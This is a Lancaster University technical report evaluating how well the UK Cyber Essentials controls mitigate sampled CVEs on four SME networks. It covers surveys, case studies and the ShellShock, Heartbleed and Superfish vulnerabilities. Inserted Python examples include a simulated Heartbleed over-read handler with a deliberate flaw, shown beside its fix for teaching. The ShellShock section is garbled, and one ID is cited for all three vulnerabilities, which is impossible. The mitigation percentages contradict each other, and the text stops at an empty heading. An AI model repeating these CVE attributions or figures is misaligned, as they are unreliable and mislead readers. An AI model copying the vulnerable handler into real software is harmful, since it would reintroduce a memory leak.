Security Lancaster

CYBER SECURITY CONTROLS EFFECTIVENESS
A Qualitative Assessment of Cyber Essentials

Security Lancaster, Lancaster University

Contributors
Dr Jose M. Such (Principal Investigator)
John Vidler
Tim Seabrook
Prof Awais Rashid

Security Lancaster
Infolab21, SCC
Lancaster University
Lancaster
LA1 4WA
United Kingdom

Cite as
Such, J.M., Vidler, J., Seabrook, T., Rashid, A. Cyber Security Controls Effectiveness: A Qualitative Assessment of Cyber Essentials. Technical Report SCC-2015-02, Security Lancaster, Lancaster University, 2015.

Acknowledgements
This Cyber Security research project was funded by the UK Government.

Disclaimer
This material is provided for general information purposes only. You should make your own judgement as regards use of this material and seek independent professional advice on your particular circumstances. Neither the publisher nor the author nor any contributors assume any liability to anyone for any loss or damage caused by any error or omission in the work, whether such error or omission is the result of negligence or any other cause.
Contents
Executive Summary 2
Introduction 3
    Aims 3
Methodology 4
    Data Collection 4
    Vulnerabilities 4
    Mitigation Assessment 5
Analysis 6
    Full Vulnerabilities Assessment 6
    Case Studies 6
    Survey Responses 8
Analysis of Cyber Essentials on High Profile Vulnerabilities 10
    "ShellShock" 10
    "Heartbleed" 10
    "Superfish" 10
    Threat Analysis 11
Conclusions 12
    Additional Tools 12
    Cyber Essentials Controls 12
    Recommendations 12
References 13
Cyber Controls Applicability 14
CVE Details 19
Survey Responses 27
Executive Summary

Findings

This report assesses the effectiveness of the Cyber Essentials controls in mitigating cyber-threats.

Two hundred randomly selected internet-originating vulnerabilities are analysed for mitigation across four SME networks, with and without the Cyber Essentials controls in place. A network built from survey responses is used to assess the typicality of the SME networks, as well as to develop a broader understanding of typical SME network configurations and security practice.

The aggregated results show that without the Cyber Essentials controls none of the attacks assessed were mitigated on any network. This, more than anything else, should be understood by SMEs: taking no action to combat cyber threats simply isn't an option.

With the CE tools, more than 99% of the vulnerabilities in the SMEs interviewed were mitigated, as shown in the figure below, which depicts the aggregated results across all cases studied. The approx. 13% of exploits only partially mitigated rely on hardware or software vendors to release patches promptly and effectively to combat any vulnerabilities.

Once the vendor has released a security patch, the Patch Management component of Cyber Essentials ensures that the system returns to a secure state. However, until a patch is released there remains a vulnerability in the network. For this reason, SMEs should frequently consider what services or software are installed, whether they are necessary, and whether a more secure alternative is available.

The few vulnerabilities not mitigated by Cyber Essentials are so because of fundamental hard-coded flaws in hardware or software that cannot be updated or patched to a secure state.
Figure 1 Cyber Essentials Aggregated Vulnerability Mitigation Results
Recommendations
Although the Cyber Essentials tools have been shown to successfully mitigate the vast majority of the attacks assessed, it is important to note that only 'commodity-level' exploits (as defined by the Cyber Essentials Framework)[10] viable for a remote attack have been considered.

The scope of this report does not address vulnerability to insider threats, social engineering, physically proximate attackers or other targeted attacks; a follow-up study with a wider scope is recommended to investigate the risks from other forms of attack with the use of Cyber Essentials.

The '10 Steps to Cyber Security' report published by CESG[2] highlights that, in order to maximise the security of a network, it is essential not only to consider the prevention of attacks with the use of tools, but also to ensure that all employees are adequately educated in network security and subject to scrutiny through access logs and data-loss-prevention schemes, in order to achieve a secure business in the face of potential local and remote attacks. We would recommend that, especially for larger organisations, additional security measures such as these be put in place.

For hardware or software identified as inherently flawed, resulting in unmitigatable vulnerabilities, our recommendation is that these pieces of software or hardware be avoided at all costs when developing an SME network. In addition, a global list of unsafe products could be collectively developed and made publicly available. This relates to our last recommendation, of integrating Cyber Essentials further with collective security approaches such as the Cyber-security Information Sharing Partnership (CiSP)[4]. These approaches keep SMEs up to date with the latest information about vulnerabilities and other cyber-threat information.
CYBER SECURITY CONTROLS EFFECTIVENESS, Security Lancaster. Page 2 of 28
Introduction

Cyber Essentials was introduced as a government-funded scheme, first published in April 2014, in the interest of national security to bolster UK security in cyberspace. The Cyber Essentials scheme was developed in collaboration with the Information Assurance for Small and Medium Enterprises (IASME) consortium, the Information Security Forum (ISF) and the British Standards Institution (BSI) as a set of basic technical security controls for organisations to utilise for the mitigation of the 'bottom 80%' of remote cyber-threats[3].

The scheme, built to provide an implementable version of the 10 Steps to Cyber Security[1], was released as part of the 2011 UK Cyber Security Strategy[16] and is being backed by the UK government as an organisational standard. Thus far it has been adopted by several large organisations, including Vodafone, Hewlett-Packard (HP), BAE Systems, Virgin Media and Barclays[5].

The Cyber Essentials accreditation has been made mandatory from October 1st 2014 for all suppliers of government contracts involving "the handling of sensitive and personal information and provision of certain technical products and services"[17].

The Cyber Essentials security controls are summarised as follows[7]:
Firewalls and Gateways: These are devices designed to prevent unauthorised access to or from private networks, but good setup of these devices, in either hardware or software form, is important for them to be fully effective.

Secure configuration: Ensuring that systems are configured in the most secure way for the needs of the organisation.

Access control: Ensuring that only those who should have access to systems have access, and at the appropriate level.

Malware protection: Ensuring that virus and malware protection is installed and is up to date.

Patch management: Ensuring that the latest supported version of applications is used and all the necessary patches supplied by the vendor have been applied.
Figure 2 Cyber Essentials Security Tools
The intended scope of Cyber Essentials is outlined in the Cyber Essentials Scheme Assurance Framework[10]. This states that the CE controls are considered applicable to all sizes of enterprise as a base level of protection against cyber-attacks, upon which individual organisations may build with further tools, network devices or protocols for the mitigation of targeted attacks. The CE Scheme is clear in its inclusion of 'Bring Your Own Device' network setups in scope, as well as cloud-based services and off-the-shelf web applications. Bespoke IT systems, such as in manufacturing and retail, are applicable to CE but hold additional vulnerabilities due to their nature that are not to be considered.
Aims
The purpose of this report is to investigate the effectiveness of the Cyber Essentials controls in mitigating 'commodity-level' attacks attempting to exploit vulnerabilities in Small and Medium Enterprise (SME) networks.

A commodity-level attack has been defined by CESG[8] as:

Any unauthenticated remote attack exploiting a known vulnerability with the use of tools and techniques openly available for download or purchase on the internet - and that do not require extensive specialist knowledge to conduct.¹

To effectively assess Cyber Essentials it is firstly necessary to understand the typical network configurations of SMEs. Interviews with SMEs were carried out to build abstracted network models, and a survey has been conducted to build a broader picture of SME network deployments. The survey results will help to develop our understanding of current security practice and cyber-awareness, as well as to build a general-case SME network with which to analyse the typicality of the SMEs interviewed.

The networks modelled from collected data are to be considered with and without the use of the Cyber Essentials security controls, to comparatively establish the protection granted with the adoption of the CE scheme.

¹ This includes attacks utilising pen-testing software such as Metasploit, Kali and the Poison Ivy remote access tool, which are capable of scanning network nodes for publicly known vulnerabilities in the operating system, applications or services in use.
Methodology

The scheme of work for this report has been split into the following sections:

• Collection of data through interviews and a survey regarding the implementation and deployment of networks in real-world SMEs, for use in designing paper models to be analysed.

• Composition of a list of suitable vulnerabilities that contains applicable methods by which remote attackers can carry out commodity-level attacks.

• Assessment of vulnerability mitigation for SME networks with and without the use of the CE tools.
Data Collection
In order to analyse the effectiveness of the Cyber Essentials Security Tools, four real-world SME networks have been modelled. Models have been composed using information gathered in interviews and abstracted to reduce redundant complexity and remove any linkage with the SME. In addition, a generalisable SME model was composed from survey responses to serve as a baseline network from which all SME networks may be adapted.
Interviews
The interviews were composed with the goal of firstly understanding the layout, or topology, of the network deployed by an SME. To then build on the network configuration, it was important to understand how the network is used - where remote connections take place, how local services are utilised and how an attacker sees the network. Hardware vendors, operating systems and version numbers were considered to build a greater understanding of the network.

Additional questions were posed to examine the current state of security on the network, such as any security accreditations, previous breaches and how often updates are rolled out.
Survey
The survey was constructed as a stripped-down questionnaire representing the essence of the questions posed in the interviews. This included details of the number of workstations at the SME to gauge its size, the local and remote services available, the operating systems used on the service providers and workstations, the current security policies in place and the respondents' awareness of the CE Scheme.

Two surveys were sent out: one to a secure list of SMEs in the NW Security Cluster[9] and another publicly to closed groups of security-interested SME representatives.
Vulnerabilities
A total of 200 random vulnerabilities have been taken in equal numbers from the two annual vulnerability lists CVE-2013 and CVE-2014 published by Mitre². Any vulnerabilities found to be unsuitable for analysis have been replaced by a new candidate.

In this report we use the Mitre organisation's definition of a vulnerability, which they state as:
An information security "vulnerability" is a mistake in software that can be directly used by a hacker to gain access to a system or network. CVE considers a mistake a vulnerability if it allows an attacker to use it to violate a reasonable security policy for that system (this excludes entirely "open" security policies in which all users are trusted, or where there is no consideration of risk to the system).

(As shown on Mitre.org's Terminology page[6] in March '15)

² CVE is sponsored by US-CERT in the office of Cybersecurity and Communications at the US Department of Homeland Security.

Figure 3 Methodology for Assessing Cyber Essentials
To warrant a CVE entry in the Mitre list, individual vulnerabilities must place the affected system (or systems) into a state which either:

• allows an attacker to execute commands as another user;

• allows an attacker to access data that is contrary to the specified access restrictions for that data;

• allows an attacker to pose as another entity; or

• allows an attacker to conduct a denial of service.
High-Profile Vulnerabilities
Three specific high-profile vulnerabilities were also taken in addition to the randomly chosen 200, and have been assessed for the extent to which the Cyber Essentials scheme would affect the vulnerability of SMEs in these situations.

Additionally, the applicability of these vulnerabilities to the SME networks we studied is included, along with the respective potential to harm operations.
Mitigation Assessment
The vulnerabilities chosen have been qualitatively assessed for mitigation with and without the use of the Cyber Essentials controls. The process considers each component of the controls in asserting whether each vulnerability would be mitigated, partially mitigated or not mitigated. The results are double-vetted to ensure correctness.

For each of the SMEs interviewed, each of the vulnerabilities is assessed for applicability to that network configuration. In cases where the vulnerability is for a specific model of hardware, the network is deemed applicable if it uses a like-product from the same vendor. In cases where the vulnerability is in software, only those referencing software in use or likely in use (based on the SME's practice) are deemed applicable to the network.
Analysis

The analysis of the data collected has been split into sections. Firstly, each of the vulnerabilities has been assessed to ascertain its mitigation with and without the use of the Cyber Essentials controls; this supposes a case where any software or hardware source of a vulnerability is in use (i.e. a worst-case, fully inclusive assessment).

What follows is an analysis of the information gathered from interviews. Four SMEs from distinct industries are detailed in physical infrastructure and service usage, as well as current user access policies and existing security measures in place. A summary of the mitigation results for vulnerabilities in software and hardware used for each SME network configuration is included.

The full table of the applicability of all CVE vulnerabilities to each of the network structures can be found in the CVE Details section on page 19.

Finally, the data collected from the survey is analysed and used to develop a general-case network model; the SME networks are compared to this to better understand the nuances of each market sector, as well as the overall typical configuration of SMEs.
Full Vulnerabilities Assessment
Of the entire list of 200 vulnerabilities from 2013 and 2014 deemed applicable to the study and chosen for analysis, 131 vulnerabilities were mitigated with the use of the Cyber Essentials Security Tools, 61 vulnerabilities were partially mitigated and 8 were not mitigated.

Figure 4 Percentage of Full Vulnerabilities List Mitigated

Partially Mitigated: 59 of the 61 CVEs judged as partially mitigated are so because they rely on patches from third-party software or hardware vendors, but they will be mitigated once a security fix has been released. Whatever level of security tools is deployed on a network, the security involved in using third-party software unfortunately relies on the vendor's ability to identify potential areas of risk, as well as to quickly respond to security breaches as they become apparent, with the release of patches. All software installed on an SME network should be periodically reviewed to decide whether it is necessary - or if there are more suitable and potentially more secure solutions available.

The other two partially mitigated vulnerabilities rely on website blacklisting combined with avoiding vulnerable web browser software. A secure configuration without such a browser would mitigate these vulnerabilities, but as in the Web Development SME case study it may not always be possible to avoid the use of a specific piece of software. In such a case, website blacklisting is the only defence against the vulnerabilities.

Not Mitigated - Secure Configuration: Some vulnerabilities have been found to be unmitigatable using the CE controls; in each of the cases found this is due to inherent flaws in a hardware device or software that cannot be fixed by a security patch or firmware update.

For these devices that are fundamentally flawed from a cyber-security standpoint, it can be that no level of security tools on top of the network can aid in mitigation - rather, the hardware should be replaced to ensure network security. It may be possible for a public list of all such devices to be developed as part of the government cyber-security scheme, to serve as a device blacklist for SMEs.
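The following is an added example (not the report's own tooling) that encodes the applicability rule from the Mitigation Assessment section and the verdict reasoning of this Analysis section as a small rule model, so the per-network aggregation can be reproduced on sample data. The CVE identifiers, vendors, products and networks are constructed placeholders, and the firewall and malware controls are not modelled.

```python
"""Rule model of the report's qualitative assessment (added example).

Applicability (Methodology): a hardware CVE applies if the network uses a
like-product from the same vendor; a software CVE applies only if the
software is in use or likely in use.  Verdicts (Analysis): a released patch
is mitigated by Patch management; a pending patch is partial; software with
no fix is mitigated by Secure configuration if the product can be dropped,
otherwise partial (website blacklisting only); hardware with an inherent
flaw is not mitigated.  All identifiers below are constructed placeholders.
"""

from collections import Counter
from dataclasses import dataclass
from enum import IntEnum


class Verdict(IntEnum):
    NOT_MITIGATED = 0
    PARTIAL = 1
    MITIGATED = 2


@dataclass(frozen=True)
class Vuln:
    cve: str
    kind: str            # "hardware" or "software"
    vendor: str
    product: str
    fix: str             # "released", "pending", or "none" (hard-coded flaw)


@dataclass(frozen=True)
class Network:
    name: str
    hardware_vendors: frozenset
    software_in_use: frozenset
    software_likely: frozenset = frozenset()
    unavoidable: frozenset = frozenset()   # products the business cannot drop


def applicable(v: Vuln, net: Network) -> bool:
    """Applicability rule from the Methodology section."""
    if v.kind == "hardware":
        return v.vendor in net.hardware_vendors
    return v.product in net.software_in_use or v.product in net.software_likely


def assess(v: Vuln, net: Network, ce: bool) -> tuple:
    """Return (verdict, reason) for one applicable CVE on one network."""
    if not ce:
        return Verdict.NOT_MITIGATED, "no controls in place"
    if v.fix == "released":
        return Verdict.MITIGATED, "Patch management"
    if v.fix == "pending":
        return Verdict.PARTIAL, "awaiting vendor patch"
    # No fix will ever exist for this product.
    if v.kind == "hardware":
        return Verdict.NOT_MITIGATED, "inherent hardware flaw; replace device"
    if v.product in net.unavoidable:
        return Verdict.PARTIAL, "website blacklisting only"
    return Verdict.MITIGATED, "Secure configuration (product avoided)"


def summarise(vulns, net: Network, ce: bool = True) -> Counter:
    """Count verdicts over the CVEs applicable to `net`."""
    counts = Counter({vd: 0 for vd in Verdict})
    for v in vulns:
        if applicable(v, net):
            counts[assess(v, net, ce)[0]] += 1
    return counts


# Constructed sample data, not entries from the report's 200-CVE list.
SAMPLE_VULNS = [
    Vuln("CVE-XXXX-0001", "software", "ExampleCo", "Browser A", "released"),
    Vuln("CVE-XXXX-0002", "software", "ExampleCo", "Browser A", "pending"),
    Vuln("CVE-XXXX-0003", "software", "OtherCo", "Browser B", "none"),
    Vuln("CVE-XXXX-0004", "hardware", "RouterCo", "Router R1", "none"),
    Vuln("CVE-XXXX-0005", "hardware", "RouterCo", "Router R2", "released"),
    Vuln("CVE-XXXX-0006", "software", "DbCo", "Database D", "released"),
]

# A web-development style network that must keep every browser installed.
WEB_DEV = Network(
    "web-dev", frozenset({"RouterCo"}),
    frozenset({"Browser A", "Browser B"}),
    unavoidable=frozenset({"Browser A", "Browser B"}),
)
# A cloud-reliant network with a single browser and no RouterCo equipment.
CLOUD_ONLY = Network("cloud", frozenset({"SwitchCo"}), frozenset({"Browser A"}))


if __name__ == "__main__":
    for net in (WEB_DEV, CLOUD_ONLY):
        print(net.name, "without CE:", dict(summarise(SAMPLE_VULNS, net, ce=False)))
        print(net.name, "with CE:   ", dict(summarise(SAMPLE_VULNS, net)))
```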
Case Studies
Four SMEs were interviewed to build paper models upon which the Cyber Essentials controls may be assessed. Some detail on the physical structure, usage and existing security of each network is provided.

• SME Network One represents a finance specialist SME using a combination of externally managed services for banking, in addition to internal, remotely accessible services for employees.

• SME Network Two represents a specialist SME utilising an off-site, remotely managed server for administrator services and cloud-based services for employees.

• SME Network Three represents a web services SME that accesses client servers frequently and utilises cloud-based services daily.

• SME Network Four represents a hospitality services provider with a very small company network co-located with a very large guest network component, where all of the services are remotely managed and located.
SME Network One - Finance Sector
Physical Infrastructure: The company interviewed comprised around 20 employees located at 3 sites nationally.

Remote workers connect over normal internet connections, both residential and commercial, and use both VPN and non-VPN traffic (specifically web traffic on port 80) to access services supplied by the company.
Figure 5 SME-1 Network
The hardware at the head office (where the interview was carried out) consists of equipment by 3Com, Draytek, BT and Huawei for infrastructure components. Employees use a range of machines bought between 2011 and 2014, comprising a mix of Dell and Lenovo PCs.

As most of the infrastructure is passive (most of the traffic is handled by a single 3Com BaseT-1000 switch), the firmware on the equipment is unchanged from purchase, if any firmware is present at all.

Services: At the head office site a Windows file server (SAMBA) provides local file sharing and allows remote users to access the same files via VPN. The mail server, a Microsoft Exchange Server, is an off-site deployment managed by an external company, but is a dedicated server for only this company.

Additionally, a web service and database server is run from a server at the site. This provides local HTTP access to the database it runs, and firewall rules have been put in place to allow external access to the same system for off-site employees.

Numerous other pieces of banking software are run on bank-owned remote servers and are accessed and secured via combinations of smart cards and PIN entry devices, also supplied by the banks.
User Access: Employees are permitted to access the internet from both their individual workstations and additional devices such as smart phones (technically this is not permitted by policy, but the policy is not strictly enforced). Internet access is, however, slightly filtered, with access to Facebook being blocked by the router.

Access logs for any network operations are not created, and any machine in the office can access the network, with no isolated islands.

User accounts can be migrated between machines via a Domain Controller, but in practice this is unlikely to actually happen, with users generally using their own machines.

Operating systems: Locally everything is Windows 7; the remote site uses Windows 7; 2 remote machines are Windows 8.1.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 119 were applicable to the first SME network.
Figure 6 SME-1 Vulnerability Mitigation
Because much of this SME's operations are done via browser-based interfaces to other financial companies (such as banks), it places them in the firing line for a large number of the browser-based attacks. Furthermore, as some banks require specific browser versions for their interfaces to work, they end up with several different browsers, with several versions of each, to cover all their requirements, opening them up multiple times to browser-based vectors.

Additionally, the heavy use of SSL-based communication places them in a position where any SSL vulnerabilities affect them too.
SME Network Two - Specialist Group
Physical Infrastructure: The second SME participant employs 20-25 staff based across multiple offices in one building.

Employees may bring their own devices or use a workstation provided. Workstations are connected to one of four switches via Ethernet and share a virtual LAN with other employee devices. An off-site server containing sensitive data is accessible only to administrators via SSH.

Network equipment includes an external Dell PowerEdge server, four TP-Link switch access points and a TP-Link DHCP router.
Figure 7 SME-2 Network
Services: Employee devices sharing the network can use Windows Folder Sharing. Employee devices include the OSs OS X, Windows XP, Windows 7 and Windows 8, with auto-updates enabled.

Some employees use a VPN to connect to another network for a data service. All other services are provided by cloud servers via HTTPS: email, files and database, as well as management tools; these are used daily.

User Access: Employees have no restriction on their internet access and may use their own equipment. Administrators often access a remote server (database and file store) acting as a web server. Guests may access a separate Wi-Fi network through the same access points as other office workers, but do not share the same virtual LAN as employees. Wi-Fi access logs are gathered, but no other user activity is logged. Employees can access the network from any machine, but the SME's policy is that all machines should have anti-malware and strong passwords, which are recommended to be changed periodically, with the employee machines configured to automatically lock after a period of inactivity.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 79 were applicable to the second SME network.
Figure 8 SME-2 Vulnerability Mitigation
The specialist SME had the fewest overall potential vulnerabilities, largely owed to a higher reliance on cloud-based services. Although this reduces the risk from inherent vulnerability in a network, responsibility is handed on to the service provider chosen. A certified and reputable cloud services provider should thus be sought to ensure protection through the entire chain.
SME Network Three - Web Development
Physical Infrastructure: SME-3 employs 10 workers based in one building.

Employees are restricted from using their own devices unless validated by the company head - in which case no others may share that device. Workstations are connected to one switch via Ethernet and share a virtual LAN with other employee devices.

Network equipment includes an external Dell PowerEdge server, one TP-Link switch access point and a TP-Link DHCP router.
Figure 9 SME-3 Network
Services: Employee devices sharing the network can use Windows Folder Sharing. Employee devices include the OSs OS X, Windows 7 and Windows 8, with auto-updates enabled.

All services are provided by cloud servers via HTTPS: email, files and database, as well as management tools; these are used daily.

User Access: Employees have no restriction on their internet access and commonly use all major browsers for compatibility testing.
Guests are not permitted on the network but may join a 'guest' network through the same access points with a mobile device. Wi-Fi logs and cloud service access logs are gathered and actively monitored. Employees can access the network from a validated machine, but the SME's policy is that all machines should have anti-malware and strong passwords, which are recommended to be changed periodically, with the employee machines configured to automatically lock after a period of inactivity.
Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 116 were applicable to the third SME network.
Figure 10 SME-3 Vulnerability Mitigation
The requirement for web development SMEs to operate across multiple web browsers, on various versions, to test and build a customer's website means that the network accumulates all vulnerabilities in web browsers. As this is a specialist case, a recommendation for web development organisations could be to use one up-to-date browser for general use. A bespoke policy may then be put in place.

When working on alternative browsers, employees should only access client pages where the developer has control of the web content.
SME Network Four - Hotel Services
Figure 11 SME-4 Network
Physical Infrastructure: This company is located at a single site and has equipment composed of a single desktop PC and 2 company laptops running on an ADSL router; this same router also provides the internet connection for the guests. An alternative router is available as a manual fall-back connection to the internet, but is available only to company equipment.

The guest network is split from the office network through secondary access point names, filtering traffic into a separate VLAN internal to the router.

Services: No local servers are present to provide any service to employees or guests on the network.

File storage is provided through online services including Dropbox and SkyDrive. A standalone web server, owned and managed externally, runs the company website, and bookings are managed via a globally accessible website.

All the services are accessed with SSL-secured connections (HTTPS mainly).

User Access: User access is not mediated in any way and any site can be accessed from any computer. Guests have no restrictions placed on their network usage either.

Operating systems: The company uses iOS for their mobile devices and Windows 8.1 for the office desktop and laptop PCs. Guests can bring their own equipment, so there will be a mix of all operating systems currently available, including Windows, Linux, Mac and others.

Existing Security Measures: Beyond the router's separation between the guest and office networks, no other network security measures are in place. The office PCs do have automatic patch installation configured, however, and have the Kaspersky antivirus suite installed.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 103 were applicable to the fourth SME network.
Figure 12 SME-4 Vulnerability Mitigation
Similarly to SME 1, SME 4 requires the use of web browsers for bookings and reception of guests, so enables a wide variety of attack vectors through the web.

Thankfully, the services and servers they connect to are run by larger corporations, which will hopefully have implemented at least Cyber Essentials-grade security and protection, so the actual risks should be minimal.

For the purposes of this report, however, we assume that if this company has not implemented Cyber Essentials then the services they use must also not have, leaving them open to attack.
Survey Responses
Data gathered from survey responses affords a much broader look at the typical network deployments and practice in SMEs. The full results from 17 participants may be found in the Survey Responses section on page 27.

Physical Infrastructure: The majority of respondents belong to SMEs with 0-9 workstations on site; this is related to the size of an organisation, and could be considered representative of businesses across the UK.

Services: Local - file, email, database and domain servers are the most common local service providers, all present in more than a third of SMEs. Remote - email, web hosting and file-sharing are the most common services provided remotely.

User Access: More than half of SMEs permit employees' own devices to be used in the workplace; for organisations such as these it is important to ensure that employee machines receive the same level of protection as the rest of the work network, as one vulnerable machine allows vulnerability into the whole company.

Existing Security Measures: Of the survey respondents, most SMEs have a firewall, password policy and data-loss prevention scheme in place. These are the most common security measures in place for the SMEs contacted; below these are access control, malware protection and finally patch management, which is present in a little over half of organisations.

Almost two-thirds of survey participants were previously aware of Cyber Essentials.
Survey Respondents Network
The network built from survey respondents' data considers the overall response in order to build a network easily adaptable to match that of the majority of SME network configurations.

Locally, email and file servers have been represented, with domain controller capabilities represented in a network ADSL router. Remotely, a web server is depicted, but remote services may also include database usage, email and other web services.
Figure 13 Adaptable Survey-Response Network
Typicality of Case-Study SMEs
Within the survey respondents' network, aspects of each of the interviewed SME networks are apparent.

The Finance SME network shares a local file server, as sensitive information needs to be kept and processed by the organisation. Any SME handling sensitive information will be likely to strongly consider using local file servers.

The Specialist SME shares with the survey respondents' data its use of SSH to connect remotely to services. SSH is an important tool for accessing sensitive data while at home, or data that is stored remotely from the workplace.

The Web Development SME requires employees to connect to many web servers remotely; the survey respondents match this case with the use of external web-hosting services. That being said, in the general case this server is more likely to be the SME's own web-hosting solution rather than a client's.

The Hotel Services SME represents a very basic local network, using only cloud-based services remotely. This is becoming an increasingly popular trend for SMEs, as cloud services are often easier to set up and cheaper to maintain. This is also representative of many SMEs with little-to-no online presence.
Analysis of Cyber Essentials on High Profile Vulnerabilities

The following sections detail three of the high-profile vulnerabilities to hit the popular media in late 2014 to early 2015.

These are of particular note as, while they may not be the most damaging of attack vectors (although some are very serious), they have caught the attention of the public, and SMEs would be under pressure to ensure that they were protected.

With this in mind, we analyse how effective the Cyber Essentials security controls are at tackling these high-profile vulnerabilities.
ldquoShellShockrdquo
Also known by the name ldquoBashDoorrdquoShellshock hit the news as it attacked theLinux server environment and did so in aparticularly effective manner
GNU Bash through 43 processestrailing strings after functiondefinitions in the values ofenvironment variables which allowsremote attackers to execute arbitrarycode via a crafted environment asdemonstrated by vectors involvingthe ForceCommand feature inOpenSSH sshd the mod cgi andmod cgid modules in the ApacheHTTP Server scripts executedby unspecified DHCP clients andother situations in which setting theenvironment occurs across a privilegeboundary from Bash execution akaldquoShellShockrdquo NOTE the originalfix for this issue was incorrect CVE-2014-7169 has been assigned tocover the vulnerability that is stillpresent after the incorrect fix
CVE-2014-6271[13]
The exploit allowed attackers to directly execute arbitrary shell commands on a compromised system by altering environment variables. However, the bug was not enough by itself to actually enable attackers to compromise a system, but allowed access via other services. While the exploit is only effective if the bash environment can be altered, the results can be devastating, as it lays bare the entire system to many other forms of attack.
The threat was particularly insidious for SMEs who used Linux/Unix-based servers for services, mail servers as an example, as they would potentially have no idea that they had been compromised.
“Heartbleed”
Appearing in April 2014, the CVE-2014-6271 (aka “Heartbleed”) bug allowed attackers to directly read the active memory of a target machine through a buffer over-read. This then allowed attackers to access private credentials (or indeed anything else) in the RAM of the target.
As described in the original CVE report:
The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
CVE-2014-6271[12]
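The buffer over-read the CVE text describes comes down to one missing length comparison. The following is an added example (not code from this report or from OpenSSL): a small Python model of heartbeat processing before and after the length check that OpenSSL 1.0.1g added, run over a constructed heartbeat record and constructed adjacent memory.

```python
"""
Added example (not code from the Security Lancaster report or from OpenSSL):
a model of TLS Heartbeat processing showing why the missing length check in
OpenSSL 1.0.1 before 1.0.1g became a buffer over-read, and the check 1.0.1g added.
Record layout follows RFC 6520: 1 byte type, 2 byte payload_length, payload,
then at least 16 bytes of padding. All memory contents below are constructed.
"""
import struct
from typing import Optional

HEARTBEAT_REQUEST = 1
HEARTBEAT_RESPONSE = 2
PADDING_LEN = 16   # minimum padding required by RFC 6520


def build_heartbeat(payload: bytes, claimed_len: Optional[int] = None) -> bytes:
    """Encode a heartbeat request; claimed_len lets a caller lie about the payload length."""
    if claimed_len is None:
        claimed_len = len(payload)
    return struct.pack("!BH", HEARTBEAT_REQUEST, claimed_len) + payload + b"\x00" * PADDING_LEN


def _response(payload_len: int, echoed: bytes) -> bytes:
    return struct.pack("!BH", HEARTBEAT_RESPONSE, payload_len) + echoed + b"\x00" * PADDING_LEN


def vulnerable_respond(memory: bytes, record_len: int) -> Optional[bytes]:
    """Pre-1.0.1g behaviour: trust the peer-supplied payload length.

    `memory` stands in for the process heap: the received record occupies
    memory[:record_len] and whatever follows is unrelated data (keys, cookies...).
    """
    hbtype, payload_len = struct.unpack("!BH", memory[:3])
    if hbtype != HEARTBEAT_REQUEST:
        return None
    # payload_len is never compared with record_len, so the copy runs past the
    # received record into adjacent memory and echoes it back to the peer.
    return _response(payload_len, memory[3:3 + payload_len])


def fixed_respond(memory: bytes, record_len: int) -> Optional[bytes]:
    """1.0.1g behaviour: bound the payload length by the record actually received."""
    if record_len < 1 + 2 + PADDING_LEN:          # too short to hold header and padding
        return None
    hbtype, payload_len = struct.unpack("!BH", memory[:3])
    if hbtype != HEARTBEAT_REQUEST:
        return None
    if 1 + 2 + payload_len + PADDING_LEN > record_len:   # the check the fix added
        return None                                       # silently discard the record
    return _response(payload_len, memory[3:3 + payload_len])


def leaked_bytes(response: Optional[bytes], record_len: int) -> bytes:
    """Bytes in a response that were read from beyond the received record."""
    if response is None:
        return b""
    _, payload_len = struct.unpack("!BH", response[:3])
    echoed = response[3:3 + payload_len]
    return echoed[max(0, record_len - 3):]   # echoed bytes start at record offset 3


# Constructed scenario: a 4-byte payload whose header claims 51 bytes, followed in
# memory by a stand-in for sensitive data that happens to sit next to the record.
SECRET = b"-----BEGIN RSA PRIVATE KEY-----"   # constructed marker, not a real key
REQUEST = build_heartbeat(b"ping", claimed_len=4 + PADDING_LEN + len(SECRET))
RECORD_LEN = len(REQUEST)                      # 3 + 4 + 16 = 23 bytes actually received
HEAP = REQUEST + SECRET

if __name__ == "__main__":
    print("vulnerable leaks:", leaked_bytes(vulnerable_respond(HEAP, RECORD_LEN), RECORD_LEN))
    print("fixed response  :", fixed_respond(HEAP, RECORD_LEN))
```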
As OpenSSL is a core part of many applications and services, both in the open and closed source world, this vulnerability had the potential to damage a huge number of systems. At the time of release, various sources (including, for example, Netcraft [15]) reported that up to 17% of trusted SSL-certified servers were vulnerable to the attack.
Depending on how the SME in question operates, the threat this particular CVE posed (and indeed still poses, with as-yet-to-be-updated servers still online with the vulnerability) is difficult to discern. Obviously the vulnerability is serious, but the ability of individual SMEs to detect and correct this flaw will vary greatly depending on the individual deployments.
Larger companies with their own Linux/Unix servers may have been able to deploy the patched OpenSSL version as soon as the patch was available, but smaller businesses, or those with more cloud-based services, may not have access to the software running on the servers they use and may be at the mercy of the respective operators to implement the fix. Because of this, patch management only partially remedies this vulnerability, and other protection methods from the Cyber Essentials guidelines, such as securing configurations or controlling access, will have unknown effects.
It is vulnerabilities such as this that pose the greatest threat to SME networks, as the methods to fix the issue are often outside the control of the company, potentially leaving them vulnerable far longer than one would expect.
“Superfish”
The SDK for Komodia Redirector with SSL Digestor, as used in Lavasoft Ad-Aware Web Companion 1.1.885.1766 and Ad-Aware AdBlocker (alpha) 1.3.69.1, Qustodio for Windows, Atom Security, Inc. StaffCop 5.8, and other products, uses the same X.509 certificate private key for a root CA certificate across different customers' installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging knowledge of this key, as originally reported for Superfish VisualDiscovery on certain Lenovo Notebook laptop products.
CVE-2014-6271[14]
This vulnerability is particularly interesting, as the software causing the issue was effectively brokered by a trusted hardware vendor, namely Lenovo. Because the issue was part of the ‘normal configuration’ for the equipment, it remained undetected for a long time, and hints that there may be further breaches in security as yet undiscovered in both Lenovo and other manufacturers' equipment.
The vector is through the SuperFish software essentially breaking the chain of trust for SSL certificates by installing a self-signing certificate into the list of trusted certificates on the host machine. This allows an attacker to simply sign their own code via the same certificate, which itself can be easily gathered from any other machine running SuperFish, and they have full access to any SSL-secured connection from the target machine.
Thankfully, while the risk to users and SMEs was high, the fix is a simple one-time run of a removal tool provided by Lenovo themselves [11], and is mitigated fully through the Cyber Essentials patch management advice.
Threat Analysis
